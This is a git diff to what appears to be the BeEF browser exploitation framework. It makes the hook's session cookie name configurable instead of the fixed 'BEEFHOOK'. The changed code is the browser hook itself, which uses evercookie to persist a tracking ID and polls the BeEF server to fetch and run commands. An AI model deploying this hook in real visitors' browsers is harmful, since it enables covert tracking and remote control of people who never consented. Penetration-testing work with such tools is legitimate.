diff --git a/core/main/client/init.js b/core/main/client/init.js index 992761e48..b18fd262a 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js @@ -13,7 +13,8 @@ * and will have a new session id. The new session id will need to know * the brwoser details. So sendback the browser details again. */ -BEEFHOOK = beef.session.get_hook_session_id(); + +beef.session.get_hook_session_id(); if (beef.pageIsLoaded) { beef.net.browser_details(); diff --git a/core/main/client/session.js b/core/main/client/session.js index 20ded71cf..303c93cc3 100644 --- a/core/main/client/session.js +++ b/core/main/client/session.js @@ -13,7 +13,8 @@ beef.session = { hook_session_id_length: 80, hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", - ec: new evercookie(), + ec: new evercookie(), + beefhook: "<%= @hook_session_name %>", /** * Gets a string which will be used to identify the hooked browser session @@ -22,12 +23,12 @@ beef.session = { */ get_hook_session_id: function() { // check if the browser is already known to the framework - var id = this.ec.evercookie_cookie("BEEFHOOK"); + var id = this.ec.evercookie_cookie(beef.session.beefhook); if (typeof id == 'undefined') { - var id = this.ec.evercookie_userdata("BEEFHOOK"); + var id = this.ec.evercookie_userdata(beef.session.beefhook); } if (typeof id == 'undefined') { - var id = this.ec.evercookie_window("BEEFHOOK"); + var id = this.ec.evercookie_window(beef.session.beefhook); } // if the browser is not known create a hook session id and set it @@ -47,9 +48,9 @@ beef.session = { */ set_hook_session_id: function(id) { // persist the hook session id - this.ec.evercookie_cookie("BEEFHOOK", id); - this.ec.evercookie_userdata("BEEFHOOK", id); - this.ec.evercookie_window("BEEFHOOK", id); + this.ec.evercookie_cookie(beef.session.beefhook, id); + this.ec.evercookie_userdata(beef.session.beefhook, id); + this.ec.evercookie_window(beef.session.beefhook, id); }, /** diff --git a/core/main/client/updater.js b/core/main/client/updater.js index 65c5de693..1dad1beb2 100644 --- a/core/main/client/updater.js +++ b/core/main/client/updater.js @@ -15,6 +15,7 @@ beef.updater = { // XHR-polling timeout. xhr_poll_timeout: "<%= @xhr_poll_timeout %>", + beefhook: "<%= @hook_session_name %>", // A lock. lock: false, @@ -57,7 +58,7 @@ beef.updater = { get_commands: function() { try { this.lock = true; - beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) { + beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) { if (response.body != null && response.body.length > 0) beef.updater.execute_commands(); }); diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 1f434189a..2bb2dfeec 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -80,8 +80,9 @@ module BeEF # @note set the XHR-polling timeout hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") - # @note set the hook file path + # @note set the hook file path and BeEF's cookie name hook_session_config['hook_file'] = config.get("beef.http.hook_file") + hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name") # @note if http_port <> public_port in config ini, use the public_port unless hook_session_config['beef_public_port'].nil?